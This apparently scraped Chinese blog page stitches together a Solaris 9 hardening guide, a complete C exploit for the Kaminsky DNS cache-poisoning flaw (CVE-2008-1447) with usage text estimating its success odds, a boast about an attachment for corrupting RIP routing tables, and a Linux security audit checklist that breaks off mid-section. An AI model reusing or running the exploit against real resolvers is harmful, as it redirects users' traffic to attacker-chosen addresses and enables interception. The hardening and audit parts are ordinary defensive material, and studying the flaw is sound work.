订阅数:73498URL:http://chinaunix.net/jh/6/590171.html
solaris 9 一般安全设置
1. 选择合适的安装。
只安装需要的软件包。
本例为solaris9
2. 安装系统补丁
从sunsolve.sun.com下载补丁
unzip 9_Recommended.zip
cd 9_Recommended
./install_cluster
3. 最小化启动服务
a. 禁止不需要启动的服务。一般情况下服务都可禁止启动
a.1 S01MOUNTFSYS
Mount all local filesystems ,不能禁止
a.2 S05RMTMPFILES
删除临时文件 需要启动
a.3 S20sysetup
系统设置 需要启动
a.4 S21perf
全部被注释掉了 。。。。。。
a.5 S30sysid.net
网络设置 需要启动
a.6 S40llc2
LLC2协议支持 需要启动
a.7 S42ncakmod
ncakmod is used to start or stop the Solaris Network Cache
and Accelerator ("NCA") kernel module 需要启动
a.8 S47pppd
ppp支持 不需要启动
执行:mv S47pppd _S47pppd
a.9 S69inet
tcp/ip的配置 需要启动
a.10 S70sckm
Sun fire 15000 Key Management Daemon 不需要启动
执行:mv S70sckm _S70sckm
a.11 S70uucp
Unix-to-Unix Copy 不需要
mv S70uucp _S70uucp
a.12 S71ldap.client
- 启动LDAP客户端 不需要
mv S71ldap.client _S71ldap.client
a.13 S71rpc
S71rpc + 启动rpcbind服务 rpcbind (RPC Portmap服务),如果需要CDE的话,这个进程是必需的 需要启动
a.14 S71sysid.sys
配置系统参数 需要
a.15 S72autoinstall
当放入sun兼容的媒体介质时,会自动启动安装脚本 不需要
mv S72autoinstall _S72autoinstall
a.16 S72directory
目录服务 不需要
mv S72directory _S72directory
a.17 S72inetsvc
启动inet server,包含named/nis 如果不需要 named和nis服务,可以禁用 不需要
mv S72inetsvc _S72inetsvc
a.18 S72slpd
打印服务 不需要
mv S72slpd _S72slpd
打印服务
a.19 S73cachefs.daemon
NFS缓存服务,可以提高NFS吞吐率 不需要
mv S73cachefs.daemon _S73cachefs.daemon
a.20 S73mpsadm
cluster 服务管理进程? 不需要
mv S73mpsadm _S73mpsadm
a.21 S73nfs.client
nfs客户端 不需要
mv S73nfs.client _S73nfs.client
a.22 S74autofs
当使用NFS时,这个进程会自动加载或卸载无用的用户网络文件系统
配置文件/etc/auto_home和auto_master
但是当没有使用nfs时,这个进程会对系统管理造成一些负面影响 不需要
mv S74autofs _S74autofs
a.23 S74syslog
系统日志服务进程 需要
a.24 S74xntpd
网络时间同步服务 不需要
mv S74xntpd _S74xntpd
a.25 S75cron
自动执行脚本服务 需要
a.26 S75flashprom
看起来象一个flash更新脚本 需要
a.27 S75savecore
核心内存转储脚本 需要
a.28 S76nscd
DNS名字缓存服务 不需要
mv S76nscd _S76nscd
a.29 S77sf880dr
针对V880机器的一个脚本 不需要
mv S77sf880dr _S77sf880dr
a.30 S80lp
打印服务 不需要
mv S80lp _S80lp
a.31 S80spc
还是打印服务 不需要
mv S80spc _S80spc
a.32 S85power
电源管理 需要
a.33 S88sendmail
邮件服务 不需要
mv S88sendmail _S88sendmail
a.34 S88utmpd
The utmpd daemon monitors the /var/adm/utmpx file
与帐号信息控制有关 ; 守护程序在规则的时间间隔内监控 /etc/utmp 文件以获得用户进程项的有效性。根据进程表
交叉校验该项的进程标识来除去/etc/utmp 文件中已终止的但未清除的用户进程。 需要
a.35 S89PRESERVE
不知所云 需要
a.36 S90loc.ja.cssd
看了脚本,不知到CS干吗 需要吧
a.37 S90wbem
WBEM,Solaris系统管理界面服务器,可以使用/usr/sadm/bin/smc
启动客户端程序连接管理 不需要
mv S90wbem _S90wbem
a.38 S91afbinit S91gfbinit S91ifbinit S91jfbinit
For systems with Elite3D Graphics 没有显卡的基本就不要了 不需要
mv S91afbinit _S91afbinit
mv S91gfbinit _S91gfbinit
mv S91ifbinit _S91ifbinit
mv S91jfbinit _S91jfbinit
a.39 S91zuluinit
Find out how many zulu cards are installed on the system 不需要
mv S91zuluinit _S91zuluinit
a.40 S93cacheos.finish
cache文件系统 不需要
mv S93cacheos.finish _S93cacheos.finish
a.41 S94Wnn6
日文输入系统 不需要
mv S94Wnn6 _S94Wnn6
a.42 S94ncalogd
NCA进程日志 不需要
mv S94ncalogd _S94ncalogd
a.43 S95IIim
启动输入法守护进程 Solaris国际化支持的一部分,启动东亚语言输入法 需要
a.44 S95svm.sync
devfsadm ,devfs同步进程 监控系统硬件,使/dev与/devices设备文件同步 需要
a.45 S98efcode
embedded FCode interpreter daemon, efdaemon is used on selected platforms as part of the processing of some
dynamic reconfiguration events 不知道干吗的, 只好让他运行了
a.46 S99atsv
可能是支持日文的,机器上没装, 不需要
a.47 S99audit
审计进程 需要
a.48 S99dtlogin
启动CDE登录进程 Solaris CDE图形界面启动进程 需要
a.49 S99rcapd
跟资源回收有关的 需要
rc3.d下面的
a.50 S13kdc.master S14kdc
Kdc服务 不需要
mv S13kdc.master _S13kdc.master
mv S14kdc _S14kdc
a.51 S15nfs.server
nfs服务 不需要
mv S15nfs.server _S15nfs.server
a.52 S16boot.server
远程启动服务 不需要
mv S16boot.server _S16boot.server
a.53 S34dhcp
dhcp服务 不需要
mv S34dhcp _S34dhcp
a.54 S50apache
http服务 不需要
mv S50apache _S50apache
a.55 S50san_driverchk
San驱动检查? 机器上没装 不需要
mv S50san_driverchk _S50san_driverchk
a.56 S76snmpdx
启动snmp服务 不需要
mv S76snmpdx _S76snmpdx
a.57 S77dmi
snmp的子服务 不需要
mv S77dmi _S77dmi
a.58 S80mipagent
启动Mobile IP 代理 不需要
mv S80mipagent _S80mipagent
a.59 S81volmgt
软盘光驱的卷管理 需要
a.60 S84appserv
Sun one server的东东 不需要
mv S84appserv _S84appserv
a.61 S89sshd
需要
a.62 S90samba
需要挂载windows文件系统才需要 不需要
mv S90samba _S90samba
a.63 S86directorysnmp
跟Sun Directory目录服务有关 不需要
mv S86directorysnmp _S86directorysnmp
a.64 S99JESsplash
不知道干吗 不需要
mv S99JESsplash _S99JESsplash
b. 与a相关的配置文件也可去除,使系统更加易于审计
4. 关闭inetd服务
a. ssh作为telnet和ftp来说更安全。
b. ssh作为启动服务并一直运行的时候,再将inetd服务器完全关闭。
c. 必须运行inetd服务的时候一定需要:
a.1. 只在inetd.conf里面保留需要服务的表项。
a.2. 对保留使用的inetd服务表项使用tcp wrappers (tcpd进程)。
a.3. 使用inetd -t 参数记录扩展的日志信息。
5. 调整内核
5.1 减少arp过期时间
ndd -set /dev/arp arp_cleanup_interval 60000
//ndd -set /dev/ip ip_ire_flush_interval 60000// solaris9 已经没有这个参数
5.2 IP Forwarding (IP转发)
a. 关闭IP转发
ndd -set /dev/ip ip_forwarding 0
b. 严格限定多主宿主机,如果是多宿主机,还可以加上更严格的限定防止ip spoof的攻击
ndd -set /dev/ip ip_strict_dst_multihoming 1
c. 转发包广播由于在转发状态下默认是允许的,为了防止被用来实施smurf攻击,关闭这一特性
ndd -set /dev/ip ip_forward_directed_broadcasts 0
5.3 路由
a. 关闭转发源路由包
ndd -set /dev/ip ip_forward_src_routed 0
5.4 ICMP:网络控制信息协议
a. 禁止响应Echo广播:
ndd -set /dev/ip ip_respond_to_echo_broadcast 0
b. 禁止响应时间戳广播
ndd -set /dev/ip ip_respond_to_timestamp_broadcast 0
c. 禁止响应地址掩码广播
ndd -set /dev/ip ip_respond_to_address_mask_broadcast 0
5.5 重定向错误
a. 禁止接受重定向错误
ndd -set /dev/ip ip_ignore_redirect 1
b. 禁止发送重定向错误报文
ndd -set /dev/ip ip_send_redirects 0
c. 禁止时间戳响应
ndd -set /dev/ip ip_respond_to_timestamp 0
5.6 SYN_flood攻击又称半开式连接攻击,
a. 将默认的队列值从1024提高到4096来降低受到攻击时的危害
ndd -set /dev/tcp tcp_conn_req_max_q0 4096
5.7 连接耗尽攻击
a. 将核心以连接队列参数(默认是128)增大到1024来预防这种攻击
ndd -set /dev/tcp tcp_conn_req_max_q 1024
5.8 防止IP 欺骗
对于solaris系统Tcp协议实现的ISN生成有三种方式。
0: 可预测的ISN
1: 增强的ISN 随机生成
2: RFC 1948描述的ISN生成方式
所有版本的solaris默认生成方式值是1。2.5.1只有 0,1两种方式,2.6/7拥有0,1,2三种ISN生成方式。
修改/etc/default/inetinit文件来提高ISN的生成强度。将 TCP_STRONG_ISS=1改为 TCP_STRONG_ISS=2重起系统生效。
5.9 增加私有端口
一般的情况下,1-1024端口被称为私有端口,只允许具有根权限的进程连接。但是有些大于1 024的端口,即使需要这样的限制,
却无法定义,如NFS的服务器端口2049,当然还有一些其他定义的高于1024的私有端口。
a. 自定义最小的非私有端口
ndd -set /dev/tcp tcp_smallest_nonpriv_port 2050
这样以来,0-2049都被定义为私有端口。
b. 用来显示已经定义的扩展私有端口
ndd /dev/tcp tcp_extra_priv_ports
c. 单独增加一个私有端口定义
ndd -set /dev/tcp tcp_extra_priv_ports_add 6112
d. 删除私有端口定义
ndd -set /dev/tcp tcp_extra_priv_ports_del 6112
e. 要注意的是,不要随便定义私有端口,因为有些非根权限的进程会使用这些端口。特别是改变最小非私有端口这个参数,
经常会引起问题。应仔细分析你的需求再用扩展私有端口定义的方式单独增加。
f. ndd /dev/tcp tcp_extra_priv_ports 执行结果(某系统)
2049
4045
9010
一共定义了3个私有端口
5.10 其他内核参数的调整
a. – Enable stack protection 直译为允许堆栈保护,应该使防止缓冲区溢出攻击
You should definitely add the following two lines to your /etc/system file:
set noexec_user_stack = 1
set noexec_user_stack_log = 1
b. – Prevent core dumps 避免核心内存转储
coreadm -d process
c. – Set limits on processes
6. 增强日志记录
Definitely tweak syslog.conf to capture
auth.info and daemon.notice msgs
? Create /var/adm/loginlog
? Additional levels of logging:
– System accounting (sar and friends)
– Process accounting
– Kernel level auditing (BSM)
7. 保护文件系统
? File systems should either be mounted
"nosuid" or "ro" (read-only)
? Set "logging" option on root file system
if you're running Solaris 8 or later
? Don't forget removable media devices:
– Turn off vold if possible
– Make sure rmmount.conf sets "nosuid"
8. 设置警告信息
两个文件 /etc/motd ;/etc/issue
– /etc/default/{telnetd,ftpd}
– EEPROM
– GUI Login
9. 加强系统的访问控制
9.1. 只允许root从console登陆
CONSOLE=/dev/console is set in /etc/default/login
sshd_config 里面设置 PermitRootLogin no
9.2. 禁止或删除不用的帐号
对不需要登陆的帐号,可将/etc/passwd文件中的shell选项修改为/bin/false 或者/dev/null
9.3. 创建/etc/ftpusers
在该文件中未指定的用户才能使用ftp服务
9.4. 禁止.rhosts支持
a. 删除系统中的.rhosts文件
b. 使用ssh的情况下,保证sshd_config文件中("IgnoreRhosts yes")
c. /etc/pam_conf and remove any lines containing rhosts_auth, even if you've disabled rlogin/rcp.
9.5. 限制对cron和at的访问
cron.allow and at.allow列出有权运行提交修改cron和at任务的用户
9.6. 设置eeprom到安全模式
Setting "eeprom security-mode=command" will cause the machine to prompt for a password
before boot-level commands are accepted. This prevents attackers with physical access from booting from
alternate media (like a CD-ROM) and bypassing your system security.
9.7. 限制xdmcp,设置锁定屏幕的屏保
If you're running X Windows on the machine, make sure to disable remote XDMCP access in
/etc/dt/config/Xaccess. You may also want to set a default locking screensaver timeout for your
users in /etc/dt/config/*/sys.resources.
10. 安装安全工具
10.1 至少的安全工具
– SSH
– TCP Wrappers
– NTP
– fix-modes
10.2 增强工具
– Tripwire, AIDE, etc.
– Logsentry (formerly Logcheck) or Swatch
– Host-based firewall, Portsentry, etc.
不要用来干坏事呀 
download
www.i170.com/Attach/93B5A865-4122-4831-8CFE-950206894801
/*
* Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning
Attack
*
* Compilation:
* $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config
--libs` -lm
*
* Dependency: libdnet (aka libdumbnet-dev under Ubuntu)
*
* Author: marc.bevand at rapid7 dot com
*/
#define _BSD_SOURCE
#include <sys/types.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <math.h>
#include <time.h>
#include <unistd.h>
#include <dumbnet.h>
#define DNSF_RESPONSE
(1<<15)
#define DNSF_AUTHORITATIVE (1<<10)
#define DNSF_REC_DESIRED (1<<8)
#define DNSF_REC_AVAILABLE (1<<7)
#define TYPE_A 0x1
#define TYPE_NS 0x2
#define CLASS_IN 0x1
struct dns_pkt
{
uint16_t txid;
uint16_t flags;
uint16_t nr_quest;
uint16_t nr_ans;
uint16_t nr_auth;
uint16_t nr_add;
} __attribute__ ((__packed__));
void format_domain(u_char *buf, unsigned size, unsigned
*len, const char *name)
{
unsigned bufi, i, j;
bufi = i = j = 0;
while (name[i])
{
if (name[i] == '.')
{
if (bufi + 1 + (i
- j) > size)
fprintf(stderr, "format_domain overflow\n"), exit(1);
buf[bufi++] = i -
j;
memcpy(buf + bufi,
name + j, i - j);
bufi += i - j;
j = i + 1;
}
i++;
}
if (bufi + 1 + 2 + 2 > size)
fprintf(stderr, "format_domain
overflow\n"), exit(1);
buf[bufi++] = 0;
*len = bufi;
}
void format_qr(u_char *buf, unsigned size, unsigned *len,
const char *name, uint16_t type, uint16_t class)
{
uint16_t tmp;
// name
format_domain(buf, size, len, name);
// type
tmp = htons(type);
memcpy(buf + *len, &tmp, sizeof (tmp));
*len += sizeof (tmp);
// class
tmp = htons(class);
memcpy(buf + *len, &tmp, sizeof (tmp));
*len += sizeof (tmp);
}
void format_rr(u_char *buf, unsigned size, unsigned *len,
const char *name, uint16_t type, uint16_t class, uint32_t ttl,
const char *data)
{
format_qr(buf, size, len, name, type, class);
// ttl
ttl = htonl(ttl);
memcpy(buf + *len, &ttl, sizeof (ttl));
*len += sizeof (ttl);
// data length + data
uint16_t dlen;
struct addr addr;
switch (type)
{
case TYPE_A:
dlen = sizeof
(addr.addr_ip);
break;
case TYPE_NS:
dlen =
strlen(data) + 1;
break;
default:
fprintf(stderr,
"format_rr: unknown type %02x", type);
exit(1);
}
dlen = htons(dlen);
memcpy(buf + *len, &dlen, sizeof (dlen));
*len += sizeof (dlen);
// data
unsigned len2;
switch (type)
{
case TYPE_A:
if
(addr_aton(data, &addr) < 0)
fprintf(stderr, "invalid destination IP: %s", data), exit(1);
memcpy(buf + *len,
&addr.addr_ip, sizeof (addr.addr_ip));
*len += sizeof
(addr.addr_ip);
break;
case TYPE_NS:
format_domain(buf
+ *len, size - *len, &len2, data);
*len += len2;
break;
default:
fprintf(stderr,
"format_rr: unknown type %02x", type);
exit(1);
}
}
void dns_query(u_char *buf, unsigned size, unsigned *len,
uint16_t txid, uint16_t flags, const char *name)
{
u_char *out = buf;
struct dns_pkt p = {
.txid = htons(txid),
.flags = htons(flags),
.nr_quest = htons(1),
.nr_ans = htons(0),
.nr_auth = htons(0),
.nr_add = htons(0),
};
u_char qr[256];
unsigned l;
format_qr(qr, sizeof (qr), &l, name, TYPE_A,
CLASS_IN);
if (sizeof (p) + l > size)
fprintf(stderr, "dns_query
overflow"), exit(1);
memcpy(out, &p, sizeof (p));
out += sizeof (p);
memcpy(out, qr, l);
out += l;
*len = sizeof (p) + l;
}
void dns_response(u_char *buf, unsigned size, unsigned
*len,
uint16_t txid, uint16_t flags,
const char *q_name, const char
*q_ip,
const char *domain, const char
*auth_name, const char *auth_ip)
{
u_char *out = buf;
u_char *end = buf + size;
u_char rec[256];
unsigned l_rec;
uint32_t ttl = 24*3600;
struct dns_pkt p = {
.txid = htons(txid),
.flags = htons(flags),
.nr_quest = htons(1),
.nr_ans = htons(1),
.nr_auth = htons(1),
.nr_add = htons(1),
};
(void)domain;
*len = 0;
if (out + *len + sizeof (p) > end)
fprintf(stderr, "dns_response
overflow"), exit(1);
memcpy(out + *len, &p, sizeof (p)); *len += sizeof
(p);
// queries
format_qr(rec, sizeof (rec), &l_rec, q_name,
TYPE_A, CLASS_IN);
if (out + *len + l_rec > end)
fprintf(stderr, "dns_response
overflow"), exit(1);
memcpy(out + *len, rec, l_rec); *len += l_rec;
// answers
format_rr(rec, sizeof (rec), &l_rec, q_name,
TYPE_A, CLASS_IN,
ttl, q_ip);
if (out + *len + l_rec > end)
fprintf(stderr, "dns_response
overflow"), exit(1);
memcpy(out + *len, rec, l_rec); *len += l_rec;
// authoritative nameservers
format_rr(rec, sizeof (rec), &l_rec, domain,
TYPE_NS, CLASS_IN,
ttl,
auth_name);
if (out + *len + l_rec > end)
fprintf(stderr, "dns_response
overflow"), exit(1);
memcpy(out + *len, rec, l_rec); *len += l_rec;
// additional records
format_rr(rec, sizeof (rec), &l_rec, auth_name,
TYPE_A, CLASS_IN,
ttl, auth_ip);
if (out + *len + l_rec > end)
fprintf(stderr, "dns_response
overflow"), exit(1);
memcpy(out + *len, rec, l_rec); *len += l_rec;
}
unsigned build_query(u_char *buf, const char *srcip, const
char *dstip, const char *name)
{
unsigned len = 0;
// ip
struct ip_hdr *ip = (struct ip_hdr *)buf;
ip->ip_hl = 5;
ip->ip_v = 4;
ip->ip_tos = 0;
ip->ip_id = rand() & 0xffff;
ip->ip_off = 0;
ip->ip_ttl = IP_TTL_MAX;
ip->ip_p = 17; // udp
ip->ip_sum = 0;
struct addr addr;
if (addr_aton(srcip, &addr) < 0)
fprintf(stderr, "invalid source IP:
%s", srcip), exit(1);
ip->ip_src = addr.addr_ip;
if (addr_aton(dstip, &addr) < 0)
fprintf(stderr, "invalid destination
IP: %s", dstip), exit(1);
ip->ip_dst = addr.addr_ip;
// udp
struct udp_hdr *udp = (struct udp_hdr *)(buf +
IP_HDR_LEN);
udp->uh_sport = htons(1234);
udp->uh_dport = htons(53);
// dns
dns_query(buf + IP_HDR_LEN + UDP_HDR_LEN,
(unsigned)(sizeof
(buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,
rand(),
DNSF_REC_DESIRED, name);
// udp len
len += UDP_HDR_LEN;
udp->uh_ulen = htons(len);
// ip len & cksum
len += IP_HDR_LEN;
ip->ip_len = htons(len);
ip_checksum(buf, len);
return len;
}
unsigned build_response(u_char *buf, const char *srcip,
const char *dstip,
uint16_t port_resolver, uint16_t
txid,
const char *q_name, const char
*q_ip,
const char *domain, const char
*auth_name, const char *auth_ip)
{
unsigned len = 0;
// ip
struct ip_hdr *ip = (struct ip_hdr *)buf;
ip->ip_hl = 5;
ip->ip_v = 4;
ip->ip_tos = 0;
ip->ip_id = rand() & 0xffff;
ip->ip_off = 0;
ip->ip_ttl = IP_TTL_MAX;
ip->ip_p = 17; // udp
ip->ip_sum = 0;
struct addr addr;
if (addr_aton(srcip, &addr) < 0)
fprintf(stderr, "invalid source IP:
%s", srcip), exit(1);
ip->ip_src = addr.addr_ip;
if (addr_aton(dstip, &addr) < 0)
fprintf(stderr, "invalid destination
IP: %s", dstip), exit(1);
ip->ip_dst = addr.addr_ip;
// udp
struct udp_hdr *udp = (struct udp_hdr *)(buf +
IP_HDR_LEN);
udp->uh_sport = htons(53);
udp->uh_dport = htons(port_resolver);
// dns
dns_response(buf + IP_HDR_LEN + UDP_HDR_LEN,
(unsigned)(sizeof
(buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,
txid,
DNSF_RESPONSE | DNSF_AUTHORITATIVE,
q_name, q_ip,
domain, auth_name, auth_ip);
// udp len
len += UDP_HDR_LEN;
udp->uh_ulen = htons(len);
// ip len & cksum
len += IP_HDR_LEN;
ip->ip_len = htons(len);
ip_checksum(buf, len);
return len;
}
void usage(char *name)
{
fprintf(stderr, "Usage: %s <ip-querier>
<ip-resolver> <ip-authoritative> "
"<port-resolver> <subhost> <domain>
<any-ip> <attempts> <repl-per-attempt>\n"
"
<ip-querier> Source IP
used when sending queries for random hostnames\n"
"
(typically your IP)\n"
"
<ip-resolver> Target DNS
resolver to attack\n"
"
<ip-authoritative> One of the authoritative DNS servers for
<domain>\n"
"
<port-resolver> Source port used by the
resolver when forwarding queries\n"
"
<subhost>
Poison the cache with the A record
<subhost>.<domain>\n"
"
<domain>
Domain name, see <subhost>.\n"
"
<any-ip>
IP of your choice to be associated to
<subhost>.<domain>\n"
"
<attempts>
Number of poisoning attemps, more attempts increase the\n"
"
chance of successful poisoning, but also the attack time\n"
"
<repl-per-attempt> Number of spoofed replies to send per
attempt, more replies\n"
"
increase the chance of successful poisoning but, but also\n"
"
the rate of packet loss\n"
"Example:\n"
" $ %s
q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192
16\n"
"This should cause
a pwned.example.com A record resolving to 1.1.1.1 to appear\n"
"in r.r.r.r's
cache. The chance of successfully poisoning the resolver
with\n"
"this example
(8192 attempts and 16 replies/attempt) is 86%%\n"
"(1-(1-16/65536)**8192). This example also requires a bandwidth of
about\n"
"2.6 Mbit/s (16
replies/attempt * ~200 bytes/reply * 100 attempts/sec *\n"
"8 bits/byte) and
takes about 80 secs to complete (8192 attempts /\n"
"100
attempts/sec).\n",
name, name);
}
int main(int argc, char **argv)
{
if (argc != 10)
usage(argv[0]), exit(1);
const char *querier = argv[1];
const char *ip_resolver = argv[2];
const char *ip_authoritative = argv[3];
uint16_t port_resolver = (uint16_t)strtoul(argv[4],
NULL, 0);
const char *subhost = argv[5];
const char *domain = argv[6];
const char *anyip = argv[7];
uint16_t attempts = (uint16_t)strtoul(argv[8], NULL,
0);
uint16_t replies = (uint16_t)strtoul(argv[9], NULL,
0);
if (domain[strlen(domain) - 1 ] != '.')
fprintf(stderr, "domain must end
with dot(.): %s\n", domain), exit(1);
printf("Chance of success: 1-(1-%d/65536)**%d =
%.2f\n", replies, attempts, 1 - pow((1 - replies / 65536.),
attempts));
srand(time(NULL));
int unique = rand() + (rand() << 16);
u_char buf[IP_LEN_MAX];
unsigned len;
char name[256];
char ns[256];
ip_t *iph;
if ((iph = ip_open()) == NULL)
err(1, "ip_open");
int cnt = 0;
while (cnt < attempts)
{
// send a query for a random
hostname
snprintf(name, sizeof (name),
"%08x%08x.%s", unique, cnt, domain);
len = build_query(buf, querier,
ip_resolver, name);
if (ip_send(iph, buf, len) !=
len)
err(1,
"ip_send");
// give the resolver enough time to
forward the query and be in a state
// where it waits for answers;
sleeping 10ms here limits the number of
// attempts to 100 per sec
usleep(10000);
// send spoofed replies, each reply
contains:
// - 1 query: query for the "random
hostname"
// - 1 answer: "random hostname" A
1.1.1.1
// - 1 authoritative nameserver:
<domain> NS <subhost>.<domain>
// - 1 additional record:
<subhost>.<domain> A <any-ip>
snprintf(ns, sizeof (ns), "%s.%s",
subhost, domain);
unsigned r;
for (r = 0; r < replies; r++)
{
// use a txid that
is just 'r': 0..(replies-1)
len =
build_response(buf, ip_authoritative, ip_resolver,
port_resolver, r, name, "1.1.1.1", domain, ns, anyip);
if (ip_send(iph,
buf, len) != len)
err(1, "ip_send");
}
cnt++;
}
ip_close(iph);
return 0;
}
// milw0rm.com [2008-07-25]
找到了攻击RIP路由协议的方法,嘎嘎!
在此感谢二位黄先生,泽鸿(CCIE)给于我在动态路由协议上的很多指点(很久没摸路由器了,都忘干净了^_^),超毅(黑客之王)给于我对攻击思路的指点,感谢二位牛
对于运行RIP动态路由协议路由器的路由表可以通过本文的办法对其随意撰改,造成其路由表紊乱,并足以使其网络中断
不多说了,看附件
www.i170.com/Attach/4EDE0467-3D5B-468F-9EBB-0202F9024853
ps:附件暂时加密,等段时间了再发不加密的附件,如果想要密码的朋友也可以通过各种方式联系我
当然,如果您有足够的时间,您可以自己爆破它~
转载
http://blog.chinaunix.net/u/22117/showart.php?id=145271
1 系统信息
1.1 主机名、域名信息检查
1.1.1 说明:
得到系统主机名、域名
1.1.2 检查方法:
hostname domainname
1.1.3 结果分析方法:
# hostname
cat
# domainname
(none)
1.2 系统版本信息检查
1.2.1 说明:
得到系统版本信息
1.2.2 检查方法:
uname -a
1.2.3 结果分析方法:
# uname -a
Linux Sec 2.4.19 #17 SMP Wed Oct 30 14:18:13 CST 2002 i686 i686 i386 GNU/Linux
1.2.4 备注:
本例输出中系统内核版本为2.4.19
1.3 网卡信息检查
1.3.1 说明:
得到网卡信息
1.3.2 检查方法:
ifconfig -a
1.3.3 结果分析方法:
# ifconfig -a
1.3.4 备注:
HWaddr:MAC地址
inet addr:IP地址
Bcast:广播地址
Mask:掩码
如果系统已经安装iproute2(通过rpm -qa | grep iproute确认),则可以使用ip命令获得网卡信息。
获得网卡地址:
# ip add ls
获得网卡信息:
# ip link ls
获得系统ARP表:
# ip neigh ls
获得系统路由表:
# ip ro ls
更多ip命令请参考ip(8),即# man 8 ip
1.4 系统路由信息检查
1.4.1 说明:
得到系统路由信息
1.4.2 检查方法:
netstat –r ip ro ls
1.4.3 结果分析方法:
# netstat -r
# ip ro ls
1.4.4 备注:
如果系统支持ip命令,建议使用ip命令进行信息检查。
1.5 系统加载模块信息检查
1.5.1 说明:
查看系统已加载的模块
1.5.2 检查方法:
lsmod
1.5.3 结果分析方法:
# lsmod
2 补丁安装情况
2.1 系统已安装的rpm包信息检查
2.1.1 说明:
得到系统已经安装的rpm包列表
2.1.2 检查方法:
rpm -qa
2.1.3 结果分析方法:
# rpm -qa
3 帐号和口令
3.1 系统空密码帐号信息检查
3.1.1 说明:
查看系统是否存在空密码帐号
3.1.2 检查方法:
awk -F: '($2 = = "") { print $1 }' /etc/shadow
3.1.3 结果分析方法:
# awk -F: '($2 = = "") { print $1 }' /etc/shadow
3.2 系统uid=0帐号信息检查
3.2.1 说明:
查看系统uid=0的帐号
3.2.2 检查方法:
awk -F: '($3 = = 0) { print $1 }' /etc/passwd
3.2.3 结果分析方法:
# awk -F: '($3 == 0) { print $1 }' /etc/passwd
root
3.2.4 备注:
本例输出说明只有root帐号uid=0
3.3 系统缺省用户(组)信息检查
3.3.1 说明:
得到系统缺省用户(组)
3.3.2 检查方法:
cat /etc/passwd
3.3.3 结果分析方法:
查看是否存在系统缺省帐号,如:
lp, sync, shutdown, halt, news, uucp, operator, games, gopher等
3.4 系统帐号shell变量信息检查
3.4.1 说明:
得到系统帐号shell变量
3.4.2 检查方法:
cat /etc/passwd
3.4.3 结果分析方法:
# cat /etc/passwd
看最后域是否是/sbin/nologin或/dev/null
3.5 passwd、shadow文件检查
3.5.1 说明:
检查系统passwd、shadow文件,确保系统中每个用户都有密码,并且密码被shadow。
3.5.2 检查方法:
pwck
3.5.3 结果分析方法:
# pwck
3.6 系统缺省密码最短长度检查
3.6.1 说明:
得到系统缺省密码最短长度
3.6.2 检查方法:
cat /etc/login.defs | grep PASS_MIN_LEN
3.6.3 结果分析方法:
# cat /etc/login.defs | grep PASS_MIN_LEN
# PASS_MIN_LEN Minimum acceptable password length.
PASS_MIN_LEN 5
3.7 系统自动注销帐号登录检查
3.7.1 说明:
得到超时后系统自动注销帐号登录信息
3.7.2 检查方法:
cat /etc/profile | grep TMOUT
3.7.3 结果分析方法:
# cat /etc/profile | grep TMOUT
3.7.4 备注:
本例输出表示并未对自动注销帐号登录作设置
3.8 root PATH环境变量检查
3.8.1 说明:
得到root PATH环境变量,是否包含当前目录“.”
3.8.2 检查方法:
echo $PATH | grep “:.”
3.8.3 结果分析方法:
# echo $PATH | grep “:.”
3.8.4 备注:
此检查有一定的局限性,只检查了当前用户的路径设置。
3.9 禁止使用ftp的帐号检查
3.9.1 说明:
得到禁止使用ftp的帐号
3.9.2 检查方法:
cat /etc/ftpusers
3.10 结果分析方法:
# cat /etc/ftpusers
3.11 允许su为root的帐号信息检查
3.11.1 说明:
检查是否允许任何人su为root
3.11.2 检查方法:
vi /etc/pam.d/su
3.11.3 结果分析方法:
# vi /etc/pam.d/su
…
auth sufficient /lib/security/pam_rootok.so
auth required /lib/security/pam_wheel.so group=wheel
…
3.11.4 备注:
本例输出表示只有wheel组中的用户才可以允许su为root
3.11.5 bash shell保存少量命令检查
3.11.6 说明:
得到bash shell能保存的命令条数
3.11.7 检查方法:
cat /etc/profile | grep HISTSIZE
3.11.8 结果分析方法:
# cat /etc/profile | grep HISTSIZE
HISTSIZE=1000
3.12 用户对主机使用的限制检查
3.12.1 说明:
得到系统限制用户对主机使用的信息
3.12.2 检查方法:
cat /etc/security/limits.conf
3.12.3 结果分析方法:
# cat /etc/security/limits.conf
# /etc/security/limits.conf
#
#Each line describes a limit for a user in the form:
#
#<domain> <type> <item> <value>
#
#Where:
#<domain> can be:
# - an user name
# - a group name, with @group syntax
# - the wildcard *, for default entry
#
#<type> can have the two values:
# - "soft" for enforcing the soft limits
# - "hard" for enforcing hard limits
#
#<item> can be one of the following:
# - core - limits the core file size (KB)
# - data - max data size (KB)
# - fsize - maximum filesize (KB)
# - memlock - max locked-in-memory address space (KB)
# - nofile - max number of open files
# - rss - max resident set size (KB)
# - stack - max stack size (KB)
# - cpu - max CPU time (MIN)
# - nproc - max number of processes
# - as - address space limit
# - maxlogins - max number of logins for this user
# - priority - the priority to run user process with
# - locks - max number of file locks the user can hold
#
#<domain> <type> <item> <value>
#
#* soft core 0
#* hard rss 10000
#@student hard nproc 20
#@faculty soft nproc 20
#@faculty hard nproc 50
#ftp hard nproc 0
#@student - maxlogins 4
# End of file
3.12.4 备注:
本例输出表示系统并未限制用户对主机的使用(进程使用、尝试登录次数等)
3.13 系统是否允许guest或匿名连接信息检查
3.13.1 说明:
查看系统是否允许guest或匿名连接
3.13.2 检查方法:
cat /etc/ftpaccess | grep class
3.13.3 结果分析方法:
# cat /etc/ftpaccess | grep class
# User classes...
class all real,guest,anonymous *
4 网络与服务
4.1 系统运行进程检查
4.1.1 说明:
得到系统运行进程
4.1.2 检查方法:
ps -aux
4.1.3 结果分析方法:
# ps -aux
4.1.4 备注:
计算系统运行进程个数:# ps –aux | wc -l
4.2 系统打开端口信息检查
4.2.1 说明:
得到系统打开的端口信息
4.2.2 检查方法:
netstat -an
4.2.3 结果分析方法:
# netstat -an
4.3 系统服务信息检查
4.3.1 说明:
得到系统服务信息
4.3.2 检查方法:
lsof -i netstat -at
4.3.3 结果分析方法:
# lsof -i
netstat -at
4.3.4 备注:
如果系统未安装lsof,使用netstat –a --ip:
# netstat -a --ip
4.4 xinetd/inetd服务信息检查
4.4.1 说明:
